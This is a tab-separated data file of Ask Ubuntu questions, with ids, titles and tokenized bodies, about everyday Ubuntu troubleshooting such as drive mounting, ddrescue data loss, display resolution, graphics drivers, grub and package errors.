387300	writing data to another hard drive when using bittorrent sync	i 'm probably making a noob mistake , but i was basically trying to learn how to mount another hard drive for use with bittorrent sync . here is what is did went into the terminal to create my folders and mount my drive : sudo mkdir /media/myfolder sudo mount /dev/sdb1 /media/myfolder now , compared to windows where administrators identify drives as letters , it mentioned that the hard drives appear as part of the file system . now , theory wise , what i really wanted to do was write data to my /dev/sdb1 drive , but instead it added data to my /media/myfolder drive on my primary operating system drive . what would enable me to `` mount '' my hard drive into the system so that the data gets written on my /dev/sdb1 drive ?
387303	ddrescue screwup	i 'm a noob messing with things i realize now i should n't have been . i was trying to follow a guide using ddrescue to recover data off a hard drive that crashed/has bad sectors . both my internal and external hard drive are/were ntfs windows partitions . i used command : sudo ddrescue /dev/sda2 /dev/sdc /home/ddrescue.log where sda2 was the bad partition on my internal hard drive and sdc was my external hard drive . i thought it would copy to a folder , well , i just hosed my partitions on my external hard drive , now it wo n't mount . is it screwed , is it fixable ? please save me from my noobness .
387305	ca n't ssh using l2tp-ipsec-vpn on 13.10	i am connecting to my office using l2tp-ipsec-vpn v 1.0.9 on ubuntu 13.10 . the connection succeeds , and i can ping to internal servers at the office , however when i attemp to ssh to these servers the connection times out stating connection closed by 10.69.* . *** this connection works fine from the same machine booted into osx . what should i do ?
387306	desktop ubuntu version for an amd64 athlon cpu location on this site ?	lots of great amd64 athlon discussion here , but i can not find the .iso . please include the download url . when i go to the download page , the pull-down only allows selection of 32 or 64 bit version of ubuntu , but does not identify it as intended for the amd64 . update : sorry , i just did the actual version 13.1 download and to my surprise , it has the string amd64 in the fine name . i think i just answered my own question .
387310	how to fix error id 197 on external harddrive	i have been trying to reformat my seagate backup plus drive external hdd , and have been unsucessful in doing so . i have formatted , and reformatted several times on both ubuntu 12.04 , and windows vista , thinking that the screen froze my hdd has unplugged either by accident disconnection , or me just pulling it out . it pops up on screen , but when i try to format the partition this error pops up ( /dev/sdc is mounted ) . when i try to check the file system this error shows up ( device is mounted and no online capability in fsck tool for file system ) . i have unmounted , and mounted properly several times , but still nothing . when i run the smart data test this is what fails ( error id 197 ) . i am really hoping to get some help with this , and any help given would be greatly appreciated .
387312	can not change resolution on lubuntu	i tried using lubuntu , but apparently i have a problem with the resolution , not the desktop image and the interface is well shown , but if i go to console with ctrl+alt+f1 and if it looks fine , with no problems try the xrandr but nothing . what can i do ? additional info : processor : pentium 4 monitor : samsung syncmaster 3 graphic chipset : nvidia riva 128zx maximum resolution supported by the monitor:800x600 lubuntu version : 13.10 saucy salamander
387314	why wo n't `import` correctly capture the inside of a window rendered in opengl , while `scrot` will ?	i have been experimenting with opengl recently , and i decided to take a screenshot of one of my fancy triangles with import , which is part of imagemagick . however , on two different computers , one running lxde on an intel processor with integrated graphics and the other using stock ubuntu on an amd fusion processor , and the result was the same : scrot perfectly captures my entire screen , whereas import has problems with my opengl window but nothing else ( by `` problems '' , i either mean data from other windows showing up in the image , or the image showing the window as not displaying anything at all ) . what is causing this ? why does scrot work perfectly fine with opengl , while import does n't ?
387315	ca n't ping external network on ubuntu	i installed bind on ubuntu and nslookup is successful , pinging my hostname is successful , but pinging an external site ( i.e . www.google.com ) does not work . i receive the error message : ping : unknown host www.website.com any ideas why i ca n't ping an external network ? here are my settings : ifconfig ( snippet ) eth0 inet addr : 192.0.2.100 bcast:192.0.2.4 mask : 255.255.255.0 lo inet addr : 127.0.0.1 mask:255.0.0.0 /etc/hosts 127.0.0.1 testing testing.local localhost 127.0.1.1 testing /etc/hostname testing.local /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.0.2.100 netmask 255.255.255.0 network 192.0.2.0 broadcast 192.0.2.4 gateway 192.0.2.1 /etc/resolv.conf nameserver 192.0.2.100 search testing.local domain testing.local /etc/bind/named.conf.options forwarders { 192.0.2.1 ; 8.8.8.8 ; 8.8.4.4 ; } ; etc/bind/named.conf.local # forward lookup zone zone `` testing.local '' { type master ; file `` /etc/bind/zones/testing.local.db '' ; } ; # reverse lookup zone zone `` 0.0.192.in-addr.arpa '' { type master ; file `` rev.0.0.192.in-addr.arpa '' ; } ; /etc/bind/zones/testing.local.db # forward lookup $ origin testing.local . $ ttl 3d @ soa testing.local . admin.testing.local . ( 12 4h 1h 1w 1h ) @ in ns testing.local . testing.local . in a 192.0.2.100 www in a 192.0.2.100 /etc/bind/zones/rev.0.0.10.in-addr.arpa # reverse lookup $ origin testing.local . $ ttl 3d @ soa testing.local . admin.testing.local . ( 12 4h 1h 1w 1h ) @ in ns testing.local . 1 in ptr testing.local . i 'm not sure if it matters but i have not yet installed/configured dhcp yet . i also uninstalled my network-manager since it was interfering with my settings . i know i put a lot of information , basically everything i edited but i am a newbie and i 've spent all day trying to figure it out . i thank you all in advance for your help .
387321	installed kodak 3250 aio printer , but will not print	i have installed drivers for the kodak 325o aio printer but it will not print ... it stalls in the processing phase . it will not print anything . pictures , documents , anything ... can anyone help with this . looking through the forums , there seem to be issues with kodak and ubuntu . is there any fix for this that anyone knows of ?
387322	shutdown after installing	i 've installed ubuntu 13.10 from a dvd . after the process completes , it asks me to reboot . but when i reboot my computer does not start . after another reboot , it begins with a menu where i have to choose the os . options are ubutu , advanced options for ubuntu or memory test . anyone i choose , computers shut down . i 've tried with bootable dvd and the same : shutdown . now i ca n't do anything . all options shuts down the pc . how can i move out of this stuation ?
387323	what is my sudo password ? how do i find or change it ?	connor @ connor-satellite-c55-a : ~ $ sudo add-apt-repository ppa : yannubuntu/boot-repair [ sudo ] password for connor : sorry , try again . [ sudo ] password for connor : sorry , try again . [ sudo ] password for connor : sorry , try again . sudo : 3 incorrect password attempts connor @ connor-satellite-c55-a : ~ $ 100991 100991 : command not found connor @ connor-satellite-c55-a : ~ $ sudo add-apt-repository ppa : yannubuntu/boot-repair [ sudo ] password for connor : sorry , try again . [ sudo ] password for connor : sorry , try again . [ sudo ] password for connor :
387324	this kernel require an x86-64 cpu,	cpu : amd phenom ii ×6 1100t mother board : ( asus ) m5a97 pro ( iommu model 64mb enabled ) iso : ubuntu-12.04.3-server-amd64 host : windows 8.1 + virtulbox advanced menu - > cpu configuration which is called : secure virtual machine mode.（on） error : this kernel require an x86-64 cpu , but only detedcted an i686 cpu it 's fixed . the hyper-v is conflict with virtual box . thanks for all the comments .
387326	many phones to one computer , contacts sync through thunderbird local and cloud not googlecontatcs	what smartphone can be used in conjunction with ubuntuone , to synchronise a pc ( ubuntu 12.04 , thunderbid , evolution ) with multiple phones ' contact databse ( 3,000 contatcs ) . nokia n900 , nokia n70 , iphone4 , samsung galaxy s2 and s3..or other newer devices . thanks for your answer.. : )
387337	how to reset all package from ppa ?	i am getting an error failed to download repository information . i want to reset all packages from ppa and want download the standard versions released for my distribution 12.04 . what can i do ?
387338	restoring data from a unusable space in hard disk	i have installed ubuntu 13.10 in a windows xp desktop after installing , in windows i tried to allocate free space ( left after installing ubuntu in the hard disk ) . while doing so it has made some other partitions as unusable space . my problem is `` how to restore lost data from that unusable space ? '' i have read many similar questions and the corresponding answers from people in this forum , but till now i have n't found a solution . could someone help me on this subject ? thanks in advance !
387342	ca n't startup after update ubuntu 12.10 from 12.04	i used update from update manager in ubuntu 12.04 to update ubuntu 12.10 . after requirement of reboot , i saw grub was changed and i choose ubuntu option to go to ubuntu . but , it shows me that it ca n't mount to something , press s to skip and m to do something . it disappeared when i was n't understanding what it say . then , nothing display expect a dash on the top left of a black screen . i held the power button to turn off . turn on again , try to choose ubuntu and same mistake . i 'm using a dell vostro 3560 with an ati graphic card and i 'm using ubuntu and windows 7 parrallel . can you give me some clue to fix this ?
387344	xubuntu pol w/wine 1.5.29 wow eula/tos every login	i managed to get wow installed successfully using wine 1.5.29 under playonlinux 4.2.1 . i 'm not seeing any settings get saved , though . the game does n't know whether or not i 've accepted the eula or the tos when i log in , and so i have to accept both each time . it also does n't save my account name . is there anything that i 'm missing that i need to do in order to allow my settings to be persistent ?
387345	pendrive wont mount , errror	pen-drive wont mount , although its working fine on my friend system error mounting system-managed device /dev/sdc1 : command-line `mount `` /mnt/usb-hp_v210w_0419570000000162-0:0-part1 '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sdc1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
387347	unable to login after placing hadoop.sh in /etc/profile.d folder	i am stuck and ca n't login ... when i get into the ubuntu login screen and enter my password , it takes me back to the same screen . i was able to install ubuntu and run it for a few days . i was trying to install apache hive but received some errors . the issue started when i modified my /etc/profile.d folder by placing a hadoop.sh file in it based on the inputs below http : //stackoverflow.com/questions/17688466/ can not -find-hadoop-installation-hadoop-home-must-be-set-or-hadoop-must-be-in-t after i restarted my m/c , i have not been able to login . i am now unable to remove the hadoop.sh file from root and tty1 as it says 'read only filesystem ' . please help .
387351	how can i detect whether my disk is using gpt or mbr from a terminal ?	i am running ubuntu 13.10 . some links shows that : if you use an ms-dos partition table ( or mbr ) , you can only have up to four primary/extended partitions . if you use a guid partition table ( gpt ) with default settings , you can have up to 128 partitions . how do i find out whether my disk uses mbr or gpt from the terminal in ubuntu ? . so that it would be easy for me while creating partitions .
387353	how to host java based website ?	i am a web developer . i have developed a website based on java , hibernate and oracle database technologies . i want to host this website on internet . previously , i use to contact 3rd party organizations to host them on their virtual servers . now i am looking forward to host it myself . but i have no knowledge . please help me on how to host the java based website through my ubuntu desktop 13.10 .
387358	where is the declaration of execution of ecryptfs for on user login automount ?	for a ~/private mount generated by the ecryptfs helper utility , where is the declaration to execute ecryptfs on user login ? same question but for an encrypted home , as in that case it presumably would n't be in anything related to .profile . i 'm not talking about the automount file , i 'm talking about something like an upstart service listening for user login , or something executed with the same convention as ~/.profile ( on login shell ) ?
387360	after updating the ubuntu 12.04 it dont start	i have updated my ubuntu 12.04 , then it ask for restart . i restarted my system , but it is not starting , only showing a black screen with a crosser blinking on top left corner . again i have already re install the ubuntu 12.04 from my usb but the same problem ( a black screen with a crosser in left upper corner of screen ) persists.so any body help me what to do now .
387363	deja-dup failes to restore , folder does n't exist	i would be glad for some help . i 'm trying to restore my home folder under 13.10. deja-dup fails during the restore from my backup from an external disk , with the error : '' failed to restore folder does n't exist `` archive_name.tgz '' '' this occurs when i restore to original folder and when i restore to another folder . how can i get my data back and fix this error ? i really need my data . thanks for any help , much appreciated !
387364	is it possible to issue redeem codes for commercial apps in the ubuntu software center ?	does the ubuntu software center has some mechanism available to the developers to issue redeem codes ( coupons ) for commercial applications so that they can be downloaded ( and kept updated ) via usc for free ? the use case i 'm interested in is when a user purchased a license previously on another platform and now wants to use the application on ubuntu -- it just would n't be right to ask them to purchase again . it seems that some mechanism is in place , because humble indie bundle apparently used it ( see here or here or here , but i do n't see anything related in myapps . that could be because it 's still in draft stage , but other bits of ui that are n't functional yet either are already visible there .
387368	setup proxy wireless on ubuntu	my university 's wi-fi requires a proxy to be setup , and this is a picture of the configuration done on windows ! so how to apply it on ubuntu ?
387369	windows 8 / ubuntu in grub	i had problem with mounting `` windows disk '' in ubuntu , i have solved this . but now i need help with grub . i ca n't boot windows by selecting windows drive because i have installed grub on all disks . so , is there any way to add windows into grub menu ?
387370	how to generate keytab file in a single command lineďź	as the title . i am able to generate this with command ktutil , but it require sub command . which i do n't know execute sub command . if i could execute it in a script will also solve my problem .
387374	what is in ubuntu-restricted-extras ?	this is probably actually a more general question which is : how do i see which packages will be installed when i install a metapackage ? in this specific instance i have mostly only found vague descriptions like installing this package will pull in support for mp3 playback and decoding , support for various other audio formats ( gstreamer plugins ) , microsoft fonts , java runtime environment , flash plugin , lame ( to create compressed audio files ) , and dvd playback . from http : //packages.ubuntu.com/lucid/ubuntu-restricted-extras apt-get install ubuntu-restricted-extras tells me that i am installing one package : ubuntu-restricted-extras . especially in this case , i 'd like to know what i 'm putting on my computer and what agreements i am tacitly agreeing to by doing so . i 'd also sort of like to know what the difference between the various *ubuntu-restricted-extras packages are .
387375	screen edges not working with kubuntu 13.10	if you go to system settings > workspace behavior > screen edges you can theoretically configure `` hot corners '' so that when you drag your mouse to any configured corner it either displays all app windows , the desktop , or any other behavior of your choice . it 's a bit like expose on mac osx . it 's very easy to set up , but on kubuntu 13.10 with my dell xps 13 , it just does n't work ... or it would work once ( but not for all corners ! ) and then will stop working completely . i do have an external display but my laptop ' screen is basically deactivated so that i only use the external display . would be surprising this has something to do with it , though . there 's another question at kubuntu 12.04 , kde 4.10 , screen edges selectively working but i 'm unsure this is exactly the same issue thus why i 'm asking this one . is this happening for you too , and if yes , how did you debug it ?
387376	my graphic card overloads when i use flash player	when i just use my laptop normally everything works just fine . but as soon as i watch a youtube video or anything else that uses flash player in firefox my laptop starts to sound very loud . i have checked my cpu performance when this happens and my cpu is not at more then 10-20 % ( intel i5 quad ) . as soon as i pause or close youtube/flash my laptop isnt so loud anymore . i figured this might have to do with the graphic card and i wanted to know if there is any tests i can run to see how my graphic card is behaving when i 'm using flash player . when i run system testing i get this : opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6400m series opengl version string : 4.2.12337 compatibility profile context 13.101 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes compiz supported : yes because i use flash player a lot i 'm quite concerned about how my laptop is behaving . i run ubuntu 12.04 lts . how to fix this issue ?
387379	ubuntu 12.04 volume up down mute stopped working	i 'm using a lenovo sl500 for several years now and suddenly the volume keys stopped working . it could be that a kernel updated caused it - i do n't know . however when i go to the keyboard settings - > shortcuts - > sound and media , i can set e.g . volume mute with my multimedia key and then it says `` audiomute '' . but when i later hit the volume mute key nothing happens .
387383	systemd-udevd error	when ubuntu 13.10 starts there 's a seemingly endless list of errors of this form : systemd-udevd error : failed to execute ... /udev-event i reinstalled systemd but it was not solved .
387387	how to stream audio from my ubuntu 12.04lts computer to listen2myradio	i am trying to set up my own internet radio station on my computer ( ubuntu 12.04lts ) , but i ca n't seem to get it working in a proper manner . sure , i 've been using winamp under wine to transport the audio signal to listen2myradio , but i found out that it is too unstable . many times it works and on several occasions winamp would n't connect to my devices . that 's why i want to switch to just native ubuntu ( linux ) solutions . i have surfed the internet , but all i can come up with are winamp solutions and i do n't want that . can someone point out to me what software to use , how to configure it and how to create a stable connection to the listen2myradio streaming server ? even a link to a good tutorial ( written/video ) would suffice . i would like to point out that i do not want to set up a local audio stream ! ! the whole world should be my playing ground ; - ) thanks in advance for your help . much appreciated .
387388	ubuntu drains battery very fast compared to windows	edit/update : here is a screenshot of powertop tuning report : link i 'm very new to ubuntu . sorry if there are a lot of similar question to this but the answers i found from others differ from one another . anyway , i 'm running a dual boot of windows 8 and ubuntu 13.10 . my problem is whenever i boot to ubuntu , my laptop 's battery gets drained rather quickly compared to when i boot windows . i also noticed excessive air blowing from the side vents of my laptop whenever i 'm on ubuntu . also , if it 's worth mentioning , my laptop is a lenovo g505s . after doing research , i found out about these : laptop mode - i read that it is not needed in 13.10 but i also read from other guides that i need to install it ? tlp - must not be installed with laptop mode . is this a good power management tool ? jupiter - do i need this as well ? i installed powertop but i do n't know how to use it . please help with this . here 's the report ( i think this is the relevant one ) : link i also did the necessary tidbits like lowering brightness , only using wifi when i need it , etc . any other suggestions would be extremely helpful . thank you in advance .
387391	unresolved dependencies	recently i had an unresolved dependency warning sign . when i click on the red forbidden sign i get the followings an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/gr.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-el , e : αδύνατο το άνοιγμα ή η ανάλυση των λιστών πακέτων ή του αρχείου κατάστασης . ' , it stands for e : the package lists or status file could not be parsed or opened , in greek language . my question is on what manner can i fix it
387392	ubuntu 13.04 slowing down due to x taking 50-100 % of cpu	i have strange issue . i use my pc mostly to run some java app , execute some command line , watch movies and use browser ( chromium ) , eg . to watch youtube , play some flash games and read . not much more . some time ago i spotted some issue with one of the processes taking a lot of cpu and causing low frame rate ( 2-4fps or similar , even though the sound is okay ) until i restart my machine . the command is as follows , when viewed using htop : /usr/bin/x :0 -background none -verbose -auth /var/run/gdm/auth-for-gdm-eirvff/database -nolisten tcp vt7 from http : //askubuntu.com/a/179795/18697 it looks like that may have been caused by bad driver or some extra features taking too much processing speed . from settings- > details- > graphics i know , that the driver setup is `` intel速 sandybridge mobile '' , but i have not found the ability to change that , nor i found any other settings ( eg . related to compiz ) . according to my pc specs , the card i have is nvidia gt520mx . i could mess with various configuration files , try to install various external libraries , but i think there is some standard way to deal with that . how can i fix this problem , so x stops taking so much cpu and the pc works faster ? update : i applied tips listed here , which came down to typing the following commands : sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings but when i run sudo nvidia-settings , i see the following message : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . the problem is , that nvidia-xconfig is not found in my system , and installing nvidia-current does not change it . any additional clues ?
387393	unity-service-panel.log taking 18+ gb	im having strange unity-service-panel.log file behavior in ubuntu 13.10. , which in 5-6 days filled up to 18.5 gb worth of space . its located in /home/user/.cache/upstart . i have no idea whats going on ? if it continues i wont have no spare area for other services etc . for normal operating os , im down to 500+mb . ubuntu is running on 26gb all / root ssd partition . do you have any suggestions/solutions for my problem . thx in advance !
387395	appindicator documentation for python	where has the documentation for the python bindings to appindicator gone ? visiting this official looking page , all the links are broken .
387396	gnome-shell vnc remote desktop connection , ugly blue colors	when i connect to my remote gnome desktop , using remmina , during session when screen refreshes , is has ugly blue colors . you can see this behaviour in this video : http : //youtu.be/uk9m532psak is it possible to fix this ?
387397	how to add ubuntu machine in samba domain controller ?	i have configured samba primary domain controller in my ubuntu 13.04 and i had created a user and added a windows machine to it and it worked . but i also want to log in the same user in ubuntu also..how to do it ... ?
387400	syndaemon has permanently disabled touchpad taps & scrolls	tipped off by a previous question , i tried restarting syndaemon manually with the additional -t flag to make typing on my laptop somewhat less painful . ( it 's supposed to only disable taps , not movement while typing , and the default settings are hard-coded somewhere - where , actually ? ) so i did killall syndaemon ; syndaemon -i 2.0 -k -r -t -d but now , the taps and scrolls seem to have been permanently disabled ! restarting syndaemon does n't help , and neither does disabling the touchpad and turning it on again via the xfce settings dialog . i 'm running xubuntu 13.10 on a samsung series 9 , that one has a elantech ( etps/2 ) touchpad . edit : after rebooting , it works as expected . but i have to run it manually , even though i entered it into the ( sessio and startup ) - > ( application autostart ) list !
387401	how to copy wine on pendrive ?	how to copy wine in pendrive and how to install it on other computer without internet connection ? i want to install it on my friend 's pc ...
387408	is there a compressed memory available for 12.04 ? ( not compressed swap )	i have an old machine ( pentium 4 , heh ) computer , with 1gb of memory . memory is the current bottleneck ( especially with unity . ) system : 12.04.2 ( with legacy x stack . ) sidenote : will add a gpu as well , but that only helps unity , not firefox for example . i mean compressed memory as in os x - mavericks way .
387412	wacom intuos pro pth-451/k `` tablet not detected ''	having trouble trying to setup my new wacom intuos pro pen and touch small ( pth-451 ) , previously known as wacom intuos 5 . i plugged in the device hoping it would work right away with mouse input , but ubuntu or rather ... . x server does n't seem to recognise it when i have all the necessary drivers needed for other wacom tablets to work . when i call upon lsusb command it appears to see it is actually there , but it just does n't want to work at all , and even the led lights on the tablet show up to show it is being powered , as i have it wired by usb cable . i did try googling around for answers but i just ca n't seem to find the answer i 'm looking for , i 've even tried adding it to the 50-wacom.rules but to no avail did this work , so i 've been trying to find a solution to making this work . i 'm guessing i have to do more than just edit the rules yeah ? linux vaio 3.8.0-34-generic # 49-ubuntu smp tue nov 12 18:02:44 utc 2013 i686 i686 i686 gnu/linux , ubuntu 13.04 ( 32-bit ) lsusb output : bus 002 device 025 : id 056a:0017 wacom co. , ltd bamboo fun 4x5' bus 002 device 024 : id 056a:0314 wacom co. , ltd trying to get device 024 : id 056a:0314 to work . other wacom tablet you see there is my bamboo fun cte-450 which detects and works fine . xinput output : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ dualpoint stick id=16 [ slave pointer ( 2 ) ] ⎜ ↳ alpsps/2 alps dualpoint touchpad id=17 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboofun 4x5 stylus id=11 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboofun 4x5 eraser id=13 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboofun 4x5 cursor id=14 [ slave pointer ( 2 ) ] ⎜ ↳ wacom bamboofun 4x5 pad id=15 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sony visual communication camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] lsmod output : wacom 51836 0 it 's only detecting my bamboo fun cte-450 , but not my intuos pro ( pth-451 ) . dmesg output : [ 8.770135 ] usbcore : registered new interface driver wacom [ 1133.669671 ] wacom 2-1.2:1.0 : wireless tablet connected with pid 314 [ 1133.669682 ] wacom 2-1.2:1.0 : ignoring unknown pid . [ 1291.640046 ] wacom 2-1.1:1.0 : wireless tablet connected with pid 314 [ 1291.640057 ] wacom 2-1.1:1.0 : ignoring unknown pid . [ 1301.613022 ] wacom 2-1.1:1.0 : wireless tablet disconnected does this mean i will have to compile a patch or what ? although the wacom intuos pro device is showing up in some of these commands here , it just does n't want to work . before i did try copying one of the tablet config files inside /usr/share/libwacom i did make a copy of the intuos5-touch-s.tablet config file , and just changed the device match id hoping that would still work since the wacom tablet i have is a renamed model of the intuos5-touch-s because wacom renamed their products , and should have the same functions as before without needing much configuring , or am i missing something ? i 'd love to try get this working if i can on ubuntu 13.04 . i have done a reboot to restart the x server again but this has n't worked . the buttons on the tablet do not work for anything and pen when over the drawing surface does n't receive any mouse input at all .
387416	using screenlock on xubuntu 12.04.3 lts	i 'm trying to lock my screen on my xubuntu machine and am failing . i tried using xflock and i get the following error when i run it from the terminal . /usr/bin/xflock4 : 29 : /usr/bin/xflock4 : xlock : not found what am i doing wrong ? any hints on how i can rectify this ?
387418	change the nautilius defalt zoom	i 'm on ubuntu 12.04 , i was looking for the way to change the nautilus default zoom size on listview . http : //s29.postimg.org/3xr1bj8p3/captura_de_pantalla_de_2013_12_07_08_34_18.png by default nautilus 's zoom view , under listview is like the right , how can i do to make the defalt zoom view as is in the left panel ? i do n't want to [ ctrl ] - all the folders , have to be a way to change it ...
387420	retrieve data from sql into specified place in text	i 'm very new to sql and bash-scripting , but even so i 've manage to make a sql-table with coming events . and i manage to make a script deleting old events and export everything in the table to a textfile . and this is how that code looks.. # ! bin/bash mysql -uroot -ppass kalender -e `` delete from event where datum < now ( ) '' mysql -uroot -ppass kalender -e `` select * from event '' > textfile.txt but how shall i do to make a specifik field in a text , like this.. ex . the ( date1 ) ( artist1 ) will come to ( place1 ) on ( day1 ) at ( time1 ) the ( date2 ) ( artist2 ) will come to ( place2 ) on ( day2 ) at ( time2 )
387423	how do i verify signatures of windows software in ubuntu ?	i 'm used to checking signatures in windows for software before i install it . i 'm unable to find a way to do it in ubuntu under wine . without signature verification it 's very hard to find out if the file has been modified . i prefer a gui way of doing it .
387424	why ubuntu appears in control panel list of windows ?	i downloaded the file or ubuntu installer ubuntu-12.04.3-desktop-i386 and i faced many difficulties in installing ubuntu along with windows 1.i did not find any iso file to burn it to dvd or usb 2.i found a file wubi , and clicked on it . it took me to ubuntu installer , which asked me details regarding user name and password . but there was no options like intall along with windows or replace windows . 3.it is some what similar to try ubuntu 4.it took 3-5 hrs for installing 5.after installing it asked for reboot 6.ubuntu starts up and it works well 6.but ubuntu appears in my program list of control panel is it ubuntu os ihave installed and i have recover windows from boot setup after shutdowning the system . please advise me on the above noted stuff ... thanks
387428	change resolution on lenovo b590 to 1600x900 , ubuntu 12.04lts permenently ?	using lenovo b590 my max res in displays is currently 1366x768 . im trying to change it to 1600x900 . i tried following this guide : https : //wiki.ubuntu.com/x/config/resolution # adding_undetected_resolutions but something goes wrong , first i did xrandr - this is my output : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) 1600x900_60.00 ( 0xcc ) 118.2mhz h : width 1600 start 1696 end 1856 total 2112 skew 0 clock 56.0khz v : height 900 start 903 end 908 total 934 clock 59.9hz after that xrandr -- output lvds1 -- mode 1600x900 told me it can not find the mode so i tried adding it . input cvt 1600 900 60 got : 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync now as par the guide i copied everything after modline and put it in newmode like this : xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync got this : x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 29 current serial number in output stream : 29 and that is where im stuck because now xrandr -- addmode lvds1 1600x900 still can not find mod . thank you
387432	should i install always and all new updates in `` update manager '' ?	should i install always ( and all ) new updates in `` update manager '' ? every week ( or days ) i have around 100mb of updates . if it continues like this , i will run out of space . eventually , i will end up updating only the security ones..
387435	wireless keyboard not recognised after boot	using ubuntu 13.10 on 2006 model imac . everything is great except after each boot the keyboard will not work . it is recognised in the blue-tooth settings but connection is not ticked . i have to delete it and reinstall each time . anyone help ? thanks matthew
387441	how to uninstall apps downloaded from internet in ubuntu 12.04 lts	i am new to ubuntu right now and i want to know how do we uninstall an app which i downloaded from the internet in this case a facebook messenger called ftalk . i type this command in the terminal : sudo apt-get remove ftalk but this is the answer : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what should i do ? it is driving me crazy
387443	laptop turns on but stays on black screen with lots of text	my laptop turns on but stays on a black screen with some white text it stops at *checking battery state ... the aa blinking underscore . i have done ctrl alt del it restarts and comesback to the same page.when i do f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12 it says login . i do the username but it wont let me type the password i have tries the startup interrupt menu bit nothing works anywhere !
387446	mapping a smbnetfs network drive using fstab and .smbnetfs.conf	i want a network mapping to be available to the user via smbnetfs at system startup without having to type smbnetfs /media/network every time , so i used this entry in /etc/fstab : smbnetfs /media/network fuse rw , users , noauto , allow_other 0 0 and it works , the mapping is there and it mounts when i click on it using any file manager , but the problem is that it will look for the configuration file at /root/.smb/smbnetfs.conf , and the user wo n't be able to access the samba shares with its own credentials . how can i tell smbnetfs to get the right location for the user configuration file ? i did n't want to change the /root/.smb/smbnetfs.conf file because there 's different users in need to map this share .
387453	opera does n't load google always	sometimes my opera loads for ever google . if i wait some time and try again it may work . google is my most used website so this is bit annoying . i 'm using opera 12.16 on ubuntun 12.04 internet connection is working because every other site than google works then . here is asked details captured when problem exists . theres is problem only in opera . firefox loads google normally . i 'm using wifi connection and there is few users in the network . i think not any other computer is using this network right now . i have not opera boost active or any other proxies . aapo @ aapo-aspire-3830t : ~ $ ping -c2 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . 64 bytes from 4.2.2.2 : icmp_req=1 ttl=54 time=65.2 ms 64 bytes from 4.2.2.2 : icmp_req=2 ttl=54 time=64.9 ms -- - 4.2.2.2 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 64.900/65.076/65.252/0.176 ms aapo @ aapo-aspire-3830t : ~ $ ping -c2 4.2.2.2 ping 4.2.2.2 ( 4.2.2.2 ) 56 ( 84 ) bytes of data . 64 bytes from 4.2.2.2 : icmp_req=1 ttl=54 time=65.1 ms 64 bytes from 4.2.2.2 : icmp_req=2 ttl=54 time=64.7 ms -- - 4.2.2.2 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1001ms rtt min/avg/max/mdev = 64.741/64.953/65.165/0.212 ms aapo @ aapo-aspire-3830t : ~ $ hostname google.com hostname : you must be root to change the host name aapo @ aapo-aspire-3830t : ~ $ sudo iptables -lv iptables : no chain/target/match by that name . host aapo @ aapo-aspire-3830t : ~ $ host google.com google.com has address 193.229.108.44 google.com has address 193.229.108.54 google.com has address 193.229.108.35 google.com has address 193.229.108.25 google.com has address 193.229.108.24 google.com has address 193.229.108.39 google.com has address 193.229.108.34 google.com has address 193.229.108.45 google.com has address 193.229.108.49 google.com has address 193.229.108.29 google.com has address 193.229.108.55 google.com has address 193.229.108.50 google.com has address 193.229.108.20 google.com has address 193.229.108.40 google.com has address 193.229.108.30 google.com has address 193.229.108.59 google.com has ipv6 address 2a00:1450:4010 : c04 : :8b google.com mail is handled by 40 alt3.aspmx.l.google.com . google.com mail is handled by 10 aspmx.l.google.com . google.com mail is handled by 30 alt2.aspmx.l.google.com . google.com mail is handled by 50 alt4.aspmx.l.google.com . google.com mail is handled by 20 alt1.aspmx.l.google.com .
